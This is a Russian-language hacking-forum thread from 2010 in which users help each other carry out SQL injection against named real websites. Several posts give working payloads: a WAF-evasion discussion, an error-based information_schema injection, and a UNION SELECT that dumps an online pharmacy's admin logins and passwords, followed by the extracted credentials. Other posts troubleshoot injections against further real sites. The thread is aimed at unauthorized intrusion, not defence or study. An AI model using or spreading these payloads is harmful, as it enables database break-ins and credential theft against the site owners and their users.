 |
|
10.03.2010, 16:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от YuNi|[c
карочи я вообще задолбался раскрутит эту скул:
никак не могу обходит фильтр кавычки, всё перепробовал
может кто посоветует обход
http://www.bourdela.tv/index.php?topic=2')and(1=1)--+
тоже одинаковый результат
|
|
|
10.03.2010, 17:39
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 Seravin:
mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)
http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html
почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь
а на что-то типо:
Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис |
|
|
|
10.03.2010, 17:41
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Pashkela
2 Seravin:
mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)
http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html
почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь
а на что-то типо:
Код:
http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
он тебе и так по русски пишет - Warning, потому что неправильный синтаксис там не form, а /*form*/, но за ответ спасибо, почитаю
|
|
|
|
10.03.2010, 17:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
YuNi|[c,
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
10.03.2010, 18:22
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)
Вот запрос:
http://www.pharmabort.ru/page.php?id=-16%20and%20%28SELECT%20sipt%28concat%280x3b,login, password%29,1,1%29%20from%20users%20limit%200,1%29 =1
Логин и пасс админа не выводит... |
|
|
|
10.03.2010, 19:20
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от Sharsky
Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)
Вот запрос:
Логин и пасс админа не выводит...
http://www.pharmabort.ru/page.php?id=-15 UNION SELECT 1,2,3,concat(0x7e,pharma_admins.login,0x7e,pharma_ admins.password,0x7e,pharma_admins.name,0x7e),5,6, 7,8,9,10,11,12,13,14,15+FROM+pharmabort.pharma_adm ins+LIMIT+0,1--
~mooncat~sql~netservice~
LIMIT+1,1--
~cons1~cons~Консультант
|
|
|
|
10.03.2010, 19:30
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
уже не надо этот скул
|
|
|
|
10.03.2010, 20:09
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
[Feldmarschall], ничего не выводит =(
|
|
|
|
10.03.2010, 20:27
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами:
8522087
Репутация:
0
|
|
Удалил все пробели, все ровно не выводит. Вы проходили по ссыле? Посмотрите сами.
|
|
|
|
10.03.2010, 21:15
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Подскажите, почему не отображаются данные?
Код:
http://www.spbpost.ru/index.php?page_id=69+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28%29,database%28%29%29,11,12,13,14,15,16,17+limit+1,1+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1969517){kind=avatar}
Похожие темы
Линейный вид
